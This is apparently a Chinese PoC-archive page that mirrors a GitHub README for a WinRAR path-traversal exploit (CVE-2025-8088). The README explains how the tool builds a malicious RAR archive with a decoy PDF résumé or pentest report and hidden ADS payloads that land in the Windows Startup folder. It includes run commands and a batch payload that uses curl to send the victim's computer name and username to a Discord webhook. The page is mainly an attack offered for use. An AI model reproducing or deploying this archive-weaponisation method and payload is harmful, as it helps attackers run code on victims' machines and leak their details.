目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2025-8088 PoC — WinRAR 安全漏洞

来源
https://github.com/techcorp/CVE-2025-8088-Exploit
关联漏洞
标题:WinRAR 安全漏洞 (CVE-2025-8088)
Description:WinRAR是WinRAR公司的一款文件压缩器。该产品支持RAR、ZIP等格式文件的压缩和解压等。 WinRAR存在安全漏洞,该漏洞源于路径遍历问题,可能导致任意代码执行。
Description
A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.
介绍
# CVE-2025-8088 WinRAR Exploit 🔓

A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.

- The issue with a lot of the others is they do not embedd multiple ADS streams requiring either luck you have the right path traversal or know the exact username/extraction directory. 

<p align="center">
  <img src="https://github.com/pentestfunctions/best-CVE-2025-8088/blob/main/assets/winrar_exploit.gif?raw=true">
</p>

## 🚀 How It Works

1. Creates a Decoy Document 📄 - Generates professional-looking PDF (CV or pentest report)
2. Embeds Multiple ADS Streams 🔄 - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers ⚙️ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup 📂 - Attempts to write payload to Windows startup folder when extracted

## 🛠️ Usage
```bash
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088-Exploit.py
```
## ✏️ Payload Customization
Edit the payload to call a Discord webhook:

```bash
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
```

Replace YOUR_DISCORD_WEBHOOK_URL with your actual webhook URL.

## 🔄 Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (≤7.12)
2. Payload gets written to startup folder:
   ```bash
   AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
   ```
3. On next reboot ➡️ payload executes automatically

## 📋 Requirements
- Windows OS 🪟
- Python 3.x 🐍
- WinRAR installed
- ReportLab library (pip install reportlab)
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →